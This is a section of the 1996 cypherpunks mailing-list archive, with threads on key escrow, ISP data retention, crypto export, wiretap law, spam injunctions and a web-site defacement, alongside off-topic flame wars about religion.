In-Reply-To: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961009135410Z-1218@csa-ntx.chemson.com>
Message-ID: <u6XJVD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Butler, Scott" <SButler@chemson.com> writes:

> Clipped from WELCOME TO CYPHERPUNKS
> >The cypherpunks list has its very own net.loon, a fellow named L.
> >Detweiler.  The history is too long for here
>
> Can anyone give me the details of The History of this character and wot
> he is on about

Is it time to update the welcome text and add yours truly to it?

Timmy May is an asshole.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 9 Oct 1996 19:10:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: drivers for HP LaserJet
In-Reply-To: <2.2.16.19961009192219.2e4783ac@best.com>
Message-ID: <e0XJVD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


vitamin@best.com writes:

>
> I am looking for drivers for US Robotics  for my HP Laserjet .
>
> I've contacted theU.S. Robotics support via an e-mail. They confirmed that th
> driver exists but it is available from BBS only.
>
> Is there anyway I can access through web or ftp site?
>
> Thanks a mil
>

The above has no crypto-relevance - no wonder it's cc:'d to Timmy May!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 9 Oct 1996 15:23:04 -0700 (PDT)
To: paul@fatmans.demon.co.uk
Subject: Re: BBS generator
In-Reply-To: <844888870.2598.0@fatmans.demon.co.uk>
Message-ID: <199610092220.SAA09079@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



paul@fatmans.demon.co.uk writes:
> Does anyone here know the approximate ammount of output from a BBS 
> PRNG needed to predict with some certainty the next bit or bits? - is 
> the generator totally secure, ie. do you need to factor to predict or 
> is there an attack using the output?

The whole point of a BBS generator is that you have to factor in order
to predict -- I'm sure that Schneier has a discussion on this.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 9 Oct 1996 19:08:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <v03007802ae819385a300@[207.167.93.63]>
Message-ID: <v03007802ae8210caf4d7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:26 PM -0500 10/9/96, Kevin L Prigge wrote:
>Timothy C. May said:

>> Something ISPs could do--and may do if there is sufficient customer
>> pressure--is to adopt a policy of "forward secrecy" (to slightly abuse this
>> technical term). That is, to have an explicit policy--implemented in the
>> software--of _really_ deleting the back messages once a customer downloads
>> them to his site. This means that _backups_ must be done in a careful
>> manner, such that even the backup tapes or disks are affected by a removal.
>
>Interesting thought, but it fails when it gets to my scale. It would
>be trivial to exclude a file or set of files from normal backup, but
>it would be problematic to exclude files from filesystem dumps, etc.
>The scale I deal with (40,000 users, 12gb of /home directory files and
>about the same in the mail spool) would make it almost impossible to
>provide this service with accuracy to my users.

Were I implementing this on my present system, with three hard disks (.5,
1.0, and 2.9 GB), I would just move the mail spool for the "no backups"
customers to one of the disks and then just not back it up. I realize this
could be a headache for ISPs, but the principle seems easy enough to
realize: move the mail files to a place that is not backed up.

(By the way, the backup utility I have is very easy to configure to back up
some files, not others, on all kinds of varying schedules. I would've
thought "tar" and other such vaunted Unix tools are at least as
configurable.)

Again, I think the most straightforward approach is to offer two kinds of
service: backups and no backups. And the "no backup" customers know that no
backups are kept. (BTW, it's also possible the ISP could offer a "crash
recovery" buffer of, say, a few days or a few weeks, to cover crashes of
its own system. The crash recovery disk would, ideally, be overwritten,
with no permanent copy of it ever made.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 9 Oct 1996 19:07:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Netscape does the right thing
In-Reply-To: <v03010300ae819dfddaed@[206.151.234.126]>
Message-ID: <v03007803ae8213598ea6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:43 PM -0500 10/9/96, Paul Robichaux wrote:

>When you buy Que's current Netscape book (_Special Edition, Using Netscape
>3_), the included CD has the US-only, 128-bit, non-export version of
>Navigator on it. It's a licensed copy, even! (Of course, the book also has
>a small yellow "NOT FOR EXPORT" tag on the back cover, but who's counting?)
>
>For $49, getting a licensed copy of the 128-bit Navigator 3.0 plus a 1000+
>page book is a pretty good deal. My hat's off to Netscape for choosing to
>put the 128-bit version on the CD, and to Macmillan/Que for bothering to
>get the software in the first place. I really do believe that Netscape
>wants to get secure software out as widely as possible.

Though not a new issue, this reminds me of some hypothetical issues:

* No records are kept of book purchases, of course, and Joe Blow can simply
plunk down $49 (plus tax), never register the software (if such a thing is
even asked for), and take it with him to some foreign country and make tens
of thousands of copies.

(Obviously possible with net-borne releases as well, but the book + cash
makes the example very easy to understand.)

* If the "Not for Export" label is removed, how will Customs ever detect
export? (Not that U.S. Customs checks outgoing luggage very often...as we
have discussed, nearly none of us have ever been inspected on the way of
the country, and very rarely on the way back in.)

* What if I buy the book, remove the label, and sell it to someone else?
Can he then be prosecuted for exporting that which he had no idea was "Not
for Export"?

(Ignorance of the law is no excuse, and all.)

* If this book can be printed and sold with a "Not for Export" sticker,
maybe we'll see a version of Schneier with a similar CD-ROM in it, also
marked "Not for Export."

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 9 Oct 1996 19:07:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Creative Wiretap Arguments [Was :Re: Put up or shut up]
In-Reply-To: <199610092130.OAA16970@mail.pacifier.com>
Message-ID: <v03007804ae8215c9214f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:28 PM -0800 10/9/96, jim bell wrote:

>Which raises the issue, "Is the ISP required to install 'wiretap-friendly'
>capability?"  Apparently not, if the cellular phone industry is any
>precedent:  For awhile, cops couldn't easily tap cell phones because no such
>capability had been designed into the cell-site software.  Such an omission
>was not considered a violation of law.

This is misstating things. Recall that it was the Digital Telephony Act,
passed only two years ago, which said that _phone switches_ had to be have
certain wiretap-friendly mods made, and authorized funding of up to $500
million to pay the phone companies for upgrades. design changes, etc.
(Arguably not enough money, arguably the money won't reach many companies,
and in any case the funding was delayed by Congress for a long time.)

The point being that not even a traditional phone company is in violation
of the law for not having wiretap-friendly designs! So your examples of
cellphones, etc., are beside the point.

We're discussing futures, not current illegalities.

The issue of ISPs falling under the DTA or not is, I think, a battleground
that is coming.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 9 Oct 1996 19:13:40 -0700 (PDT)
To: "Bert-Jaap Koops" <cypherpunks@toad.com
Subject: Re: Binding cryptography - a fraud!
Message-ID: <199610100212.TAA07954@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:00 PM 10/9/96 MET, Bert-Jaap Koops wrote:
>The text is also available at
>http://cwis.kub.nl/~frw/people/koops/binding.htm.
>
>9 October 1996
>Eric Verheul, everheul@ngi.nl
>Bert-Jaap Koops, koops@kub.nl
>Henk van Tilborg, henkvt@win.tue.nl
>(c) 1996 Eric Verheul, Bert-Jaap Koops, Henk van Tilborg
>This message may only be redistributed in its entirety and with
>inclusion of the copyright notice. Credit if quoting.
>
>_Binding Cryptography, a fraud-detectible alternative to key-escrow
>proposals_
[stuff deleted]

>The idea is that any third party, e.g., a network or service provider,
>who has access to components 2, 3 and 4 (but not to any additional
>secret information) can: 
>a. check whether the session keys in components 2 and 3 coincide; 
>b. not determine any information on the actual session key.
>
>In this way, fraud is easily detectible: a sender that attempts to
>virtually address a session key to the TRP (component 3) that is
>different from the real one he uses on the message (or just nonsense)
>will be discovered by anyone checking the binding data. If such
>checking happens regularly, fraud can be properly discouraged and
>punished.

I am at the same time dismayed and disgusted at the tendency of some people 
to want to "detect fraud" on the part of ordinary citizens, as this paper 
appears to want to do, but says _nothing_ about preventing fraud 
_by_government.  How is the average citizen to know if keys are being given 
out to government agents for valid reasons?

I am further enraged by the last portion of the paragraph above where he 
says, "fraud can be properly discouraged _and_punished_"  Why "punished"?   
Why call it "fraud"?  Why should sending the "wrong" bits become a crime?  
The US government, for example, has repeatedly claimed that key-escrow 
systems should be "voluntary."  Presumably, except for authoritarian and 
totalitarian countries, no other country should force their own citizens or 
others to use any sort of key-escrow/GAK system.

Maybe I'm biased:  I'm a libertarian who believes that sending the wrong 
bits shouldn't be considered a crime.  The problem we have is with the 
politicians, NOT primarily the criminals.  Giving the government the ability 
to punish people merely for sending the wrong bits (absent some other, REAL 
crime) is an enormous step backward.  And if they're guilty of a real crime, 
why bother about the bits?

Even if I believed in GAK, which I don't, I don't think governments or 
anyone else should be able to determine whether the "correct" code is 
included with the data until and unless the government has a valid warrant, 
with protections against government fraud, and has received the correct 
code.  That is the only point at which the government (even arguably) has a 
legitimate reason to know this.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 9 Oct 1996 19:30:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Missionaries BLAH BLAH BLAH
Message-ID: <199610100214.TAA19873@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


:Date: Wed, 09 Oct 1996 09:30:34 -0600
:From: Shawn Willden <swillden@cs.weber.edu>
:To: Dale Thorn <dthorn@gte.net>
:Subject: Re: Missionaries

:Dale Thorn wrote:
:> > Biblical creationism is "wrong": there's ample evidence that the
:> > Earth is *much* more than 6000 years old.  Yet lots of seemingly
:> > rational people believe biblical creationism.
:> 
:> Which years?

BLAH BLAH BLAH

;And Christian theology also offers an explanation as to why God would :do such a thing: so that faith is required for belief.
:
:Logic is of no use in theological discussions.I've dealt with more :than a few. BLAH BLAH BLAH  As a Mormon missionary I spent quite a :bit of time discussing
:theology with people :-) BLAH BLAH BLAH

:Shawn

Much better to bash Tim (no offense meant, I like Tim's style--or lack thereof) than this drivel.

Makes me want to puke.

To quote: "As for what this whole thread has to do with crypto, i have no idea..."


BLAH BLAH BLAH




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 10 Oct 1996 09:40:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
Message-ID: <844963832.27562.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Try signing your messages in the clear next time, since this sort of
> message is a little awkward to read.

Be patient man, if you start your PC on a factoring attack of his RSA 
modulus now you will be able to read the message in a few hundred billion years.
Some people just can`t wait for anything can they ;-)

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Wed, 9 Oct 1996 17:01:21 -0700 (PDT)
Subject: Will Rodger of Inter@ctive Week on ISP-TV Monday Night
Message-ID: <199610100000.UAA16719@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement: Will Rodger Interview ***

*** Monday, Oct. 14 ***
*** 9:00 PM ET      ***

Will Rodger, Washington Bureau Chief of Inter@ctive Week, will be the guest
on this week's "Real Time" interview series.  Rodger has written many articles
on Telecom policy, as well as exclusive stories on Clipper III and the appeal
of the CDA to the Supreme Court.

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network

To obtain Enhanced CU-SeeMe software, go to:

	http://goliath.wpine.com/cudownload.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 9 Oct 1996 20:28:30 -0700 (PDT)
To: camcc@abraxis.com
Subject: Re: [Noise] Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <2.2.32.19961009171834.0068ebb4@smtp1.abraxis.com>
Message-ID: <325C6CE7.6096@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


camcc@abraxis.com wrote:
> At 01:04 AM 10/9/96 -0700, you [Paul S. Penrod] wrote:
> :I suggest you [Alan Olsen] RTFM again. It was a commentary on the sad
> :state of scientific practice as germain to today's egomanical
> :pirannah who inhabit the domain of the "scientist". To publish is to
> :exist, and the first rule is "draw your curves, then plot your
> :points." The second is "Thou shalt not critisize your mentor."
> :Save the anti-religion rhetoric for someone who gives a damn.

> Well, Paul, obviously you do. Otherwise why try to justify some thinly
> disguised pseudo-scientific mumbo jumbo as "a commentary on the sad
> state of scientific practice."
> As Alan said, "I suggest you take your beliefs to talk.origins."
> BTW, what DOES this have to do with crypto, or privacy, or personal
> freedoms, or MORMONS for that matter?

It has to do with this: That religion is connected here, because people 
are connected here.  Religion is the people's way, when they're not 
getting precise answers about crypto, to offload their frustration onto 
the/a superior being, who has no such limits.

When the best thing you can say about PGP, the Golden Calf of crypto, is 
that it "may very well" or "probably will" protect your messages from 
scrutiny by the NSA et al, you can always fall back on God when they 
come and pick you up to take you to the "family camp", like you've seen 
on so many of those TV docudramas.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 9 Oct 1996 19:07:01 -0700 (PDT)
To: stewarts@ix.netcom.com
Subject: Re: Recent Web site cracks
In-Reply-To: <199610081636.MAA10912@attrh1.attrh.att.com>
Message-ID: <199610100204.VAA00327@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


stewarts@ix.netcom.com wrote:
> 
> The DOJ and CIA sites were actually cracked; don't know the mechanisms.
> The dole-kemp96.com and dole-kemp96.org domains were spoofs - they
> have similar names to the real site, and people reach them by accident
> or by hearing about them.  According to today's San Jose Mercury News,
> the web designer who registered them did so just before Dole announced
> Kemp as his VP, and tried to sell his design services to the campaign.
> They didn't buy it, and the names were sitting around with nothing
> better to do anyway, so he decided to have a good time with them.
> Supposedly he's gotten about 40,000 hits and the "real" site got 1,000,000.
> 

Anyone got a copy of the cracked CIA page?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 9 Oct 1996 21:21:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <199610082308.JAA23683@mac.ce.com.au>
Message-ID: <325C76E5.6628@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 12:44 AM -0700 10/9/96, Dale Thorn wrote:
> >Why is it that 95-plus percent of all people stay with their parents'
> >religion (more-or-less) when they grow up, instead of abandoning it,
> >or finding one on their own?  Simple.  The uncountable zillions of
> >"bytes" of information that go into your brain before you become
> >more-or-less conscious, so controls your mind by the time you are
> >conscious, that very few people can overcome this programming to any
> >significant extent.

> This is of course not true. Lots of statistics show that nowhere near
> "95%" of people stick with the religion they were raised in. In
> America, at least.

I don't know what part of America you're talking about. San Francisco?
Most of America is still to the right of you on a map, and close to 95
percent do exactly as I say.  Maybe you got your statistics from the
same media outlet that was working the OJ case.  There, they said that
"x-percent of white people think he's guilty" (usually 70 percent or
thereabouts), while I, Dale Thorn, found it to be just about 100 percent
anywhere in the country (except maybe the Bay Area, where they still
believe that a rotten little piece of crap called the Altair was the
first personal computer).

> Large numbers become nonbelievers, others become
> Vegans, Pagans, Buddhists, Bahaiists, Baalists, etc. This is
> well-documented and has been discussed for several decades.

A lot of B.S. has been discussed for several decades.

> I don't know what the current correlation is, but I'd guess it's less
> than 50%. As the old joke goes, what's the surest way to make your kid
> a nonbeliever? Send him to a religious school.
> Nothing to do with Cypherpunks, but complete errors like this "95%"
> figure ought to be corrected, if anybody is still reading this thread.

These last numbers - "less than 50%", "complete errors like 95%" are 
splendid proofs of what I said in the first paragraph above, that most 
people (like yourself) are totally controlled by their programming.  
Unless, of course, you simply wave it all away with a magic wand.

BTW, if you understood my argument, it wasn't so much about specifics of 
religion et al (which could be easily misinterpreted), it was about how 
people act entirely on their past programming, mitigated to some extent 
by incidental circumstances.  If you're inclined to give too much weight 
to the incidental circumstances, remember the first thing they tell you 
when you join the CIA: there aren't any coincidences (of any real 
significance, anyway).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Anonymous MacDonald <remailer@cypherpunks.ca>
Date: Wed, 9 Oct 1996 22:01:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: PGPW263.ZIP -- PGP Compiled for Windows
Message-ID: <199610100452.VAA22271@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello!

Need help to locate the above. Have already cjhecked the
Replay ftp site, It wasn't there. Anywhere else apart from
Lance's place?

Thank you.

Dekinda






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 9 Oct 1996 19:22:37 -0700 (PDT)
To: Jüri Kaljundi <jk@stallion.ee>@panix.com
Subject: Re: "European Union Bank"
Message-ID: <3.0b19.32.19961009220915.00fdf69c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:06 PM 10/8/96 +0300, Jüri Kaljundi wrote:
>According to one offshore magazine European Union Bank is a very bad
>choice for Internet banking. What they did was they assigned they named
>Lord Mancroft who sits in the UK's House of Lords as chairman of the bank.
>Only thing Lord Mancroft himself did not know a thing about it, although
>the bank marketing materials had a letter of welcome supposedly from that
>prominent person. So he is thinking of taking legal action against the
>bank.

I have at hand a brochure from "Shorex 96 - The Premier Offshore
Exhibition" to be held November 20-22 in London.  Day One features a
section on "Offshore and the Internet"  including a panel "Will the
Internet Increase the Market Share of the Offshore Industry?"  Featuring
"Lord Mancroft, Chairman, European Union Bank, Antigua."

I wonder if he'll be there.  If we are both there, I'll ask him.

DCF 

"If control measures are so effective, why does everything seem to be more
and more out of control?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 9 Oct 1996 19:34:03 -0700 (PDT)
To: alexf@iss.net (Alex Filacchione)
Subject: Re: "Soul Catcher" Computer Chip (fwd)
In-Reply-To: <01BBB5FC.3769FEA0@alexf.iss.net>
Message-ID: <199610100234.WAA11570@nrk.com>
MIME-Version: 1.0
Content-Type: text


Alex Filacchione sez:
> 
> 
> QUOTE
> 
> SOUL CATCHER IMPLANTS
> 
> British scientists are developing a concept for a computer chip
> which, when implanted into the skull behind the eye, will be able to
> record a person's every life time thought ands sensation.

Sounds like....

Riverworld.....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Otto Matic" <ott0matic@hotmail.com>
Date: Wed, 9 Oct 1996 22:35:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Injunction Against Spammers
Message-ID: <96Oct9.223516pdt.280792(19)@constitution.hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Today Concentric Network Corp. won an injunction [15] against Cyber Pro-
motions, Inc. -- the outfit against which AOL lost a court fight to keep
its subscribers free of email spam -- see TBTF for 9/8/96 [16]. Cyber
Promotions, it seems, was forging a Concentric Network return address in
their spams, so thousands of outraged Netizens bombarded the ISP daily
with demands that Concentric stop supporting an activity that is, in fact,
forbidden by their terms of service and of which Concentric was entirely
innocent. The wording of the promise that Cyber Promotions was compelled
to sign forbids them specifically from thus abusing Concentric in the
future. It seems to me that the spammer will be free to choose another
ISP "goat," or to forge a nonexistent return address on their future
spams, without penalty. This timely news just arrived on Glen McCready's
<glen@qnx.com> "0xdeadbeef" mailing list.

[15] <http://home.concentric.net/press/spam.html>
[16] <http://www.tbtf.com/archive/09-08-96.html>


otto
=-=-=-=-=-
Otto Matic

"Fuckin' A, Miller!"  Bud, Repo Man


---------------------------------------------------------
Get Your *Web-Based* Free Email at http://www.hotmail.com
---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 9 Oct 1996 16:26:13 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Recent Web site cracks
In-Reply-To: <9VZHVD1w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.94.961009232355.241A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 8 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> stewarts@ix.netcom.com writes:
> > The DOJ and CIA sites were actually cracked; don't know the mechanisms.
> 
> They used firewalls that are known to be easily crackable.
> 

I know, for a fact, that the CIA hack was a PHF exploit. (at least in
part, obviously thats not the _entire_ thing, and there had to be some
firewall penetration somewhere, but...)

don't ask ;)

 --Deviant
Legalize free-enterprise murder: why should governments have all the fun?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 9 Oct 1996 16:40:12 -0700 (PDT)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <325B57E0.6847@gte.net>
Message-ID: <Pine.LNX.3.94.961009233840.241B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 9 Oct 1996, Dale Thorn wrote:

> craigw@dg.ce.com.au wrote:
> > Most ppl believe what they are told to believe. Otherwise why would
> > there be so many ppl willing to take whatever the Govt servers them.
> > Afterall...The madia would not lie...;)
> 
> One example of a topic that most people (including very intelligent, 
> "technical" people) steer clear of:
> 
> Why is it that 95-plus percent of all people stay with their parents' 
> religion (more-or-less) when they grow up, instead of abandoning it, or 
> finding one on their own?  Simple.  The uncountable zillions of "bytes" 
> of information that go into your brain before you become more-or-less 
> conscious, so controls your mind by the time you are conscious, that 
> very few people can overcome this programming to any significant extent.
> 

Don't forget inheritance (my dad's a Southern Baptist minister ;)

 --Deviant
Live long and prosper.
                -- Spock, "Amok Time", stardate 3372.7






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Thu, 10 Oct 1996 00:01:05 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: RE: legality of wiretapping: a "key" distinction
Message-ID: <01BBB63F.77631E40@king1-10.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Black Unicorn [in reply to Vlad the Conqueror]

I understand that it's difficult for you to grasp how firmly entrenched
the concept of wiretapping is in law enforcement, courts and the
legislature, and that your novel new approach has been tried before.
..................................................................


This should help him understand it.   I won't say who this quote is from, but he was a very respected French author:

	"Both the English and the Americans have kept the law of precedents; that is to say, they still derive their opinions in legal matters and the judgements they should pronounce from the opinions and legal judgements of their fathers. [...]

	The English or American lawyer who thus, in a sense, denies his own reasoning powers in order to return to those of his fathers, maintaining his thought in a kind of servitude, must contract more timid habits and conservative inclinations than his opposite number in France.

	Our written laws are often hard to understand, but everyone can read them, whereas nothing could be more obscure, and out of reach of the common man, than a law founded on precedent.  Where lawyers are absolutely needed, as in England and the United States, and their professional knowledge is held in high esteem, they become increasingly separated from the people, forming a class apart.  A French lawyer is just a man of learning, but an English or an American one is somewhat like the Egyptian priests, being, as they were, the only interpreter of an occult science. [...]

	Thus it is England, above all that supplies the most striking portrait of the type of lawyer I am trying to depict; the English lawyer values laws not because they are good but because they are old; and if he is reduced to modifying them in some respect, to adapt them to the changes which time brings to any society, he has recourse to the most incredible subtleties in order to persuade himself that in adding something to the work of his fathers he has only developed their thought and completed their work.  Do not hope to make him recognize that he is an innovator; he will be prepared to go to absurd lengths rather than to admit himself guilty of so great a crime.  It is in England that this legal spirit was born, which seems indifferent to the substance of things, paying attention only to the letter, and which would rather part company with reason and humanity than with the law."

   ..
Blanc
	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Thu, 10 Oct 1996 00:01:09 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: RE: Microsoft CAPI
Message-ID: <01BBB63F.992D5360@king1-10.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Andrew Loewenstern

I ask:  "Who Cares?"  It is easy enough to distribute with the secure-non-GAK  
plug-in a patch for disabling the module authentication.  Heck, you could  
even make an ActiveX applet that did it...


andrew
"Click Here to Download and Install Real Crypto"
....................................................


Like PGP, it would need to be widely (& anonymously) made available before anyone could do anything about it....

   ..
Blanc
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 9 Oct 1996 21:36:43 -0700 (PDT)
To: Kevin.L.Prigge-2@tc.umn.edu (Kevin L Prigge)
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <325c26935621002@noc.tc.umn.edu>
Message-ID: <199610100436.AAA12534@nrk.com>
MIME-Version: 1.0
Content-Type: text


 Timothy C. May said:
 > However, there are certain things my phone company does *not* do. They
 > don't keep _copies_ (recordings) of my phone conversations. This means a
 > court order can't yield copies of past conversations. They also don't track
 > incoming phone calls to me. (I don't believe such records of incoming phone
 > calls are kept; maybe I'm wrong. Certainly with Caller ID, storing incoming
 > phone numbers is possible....I just don't think local or regional phone
 > companies care about such records, and hence don't bother to accumulate
 > them.)
 
 
"MUDs" are typically kept 24-72 hours. They list OUTGOING calls,
hence a big search is needed to translate to incoming.

But it is done...

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 10 Oct 1996 01:31:39 -0700 (PDT)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: [Noise] Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <325C6CE7.6096@gte.net>
Message-ID: <Pine.3.89.9610100115.A6104-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain



Would you folks *please* cut this thread? It has gone on long enough. Too 
long, in fact.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 10 Oct 1996 01:33:11 -0700 (PDT)
To: pclow <pclow@pc.jaring.my>
Subject: Re: Crypto AG - Secret GAK Partner ?
In-Reply-To: <325CDEE2.86A@pc.jaring.my>
Message-ID: <Pine.3.89.9610100148.A6104-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain





On Thu, 10 Oct 1996, pclow wrote:

> Hi fellow flamers, cuss'ers, ect..
> 
> Some one recently gave me a copy of an article in Der Spiegel
> (unfortunately in german!) stating that Crypto AG of Switzerland
> had passed the keys to the German Govt without informing the
> customer.

This is nothing new. But how about faxing the article to John Young, so 
we all may benefit?


Thanks,
--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 10 Oct 1996 01:39:29 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Netscape does the right thing
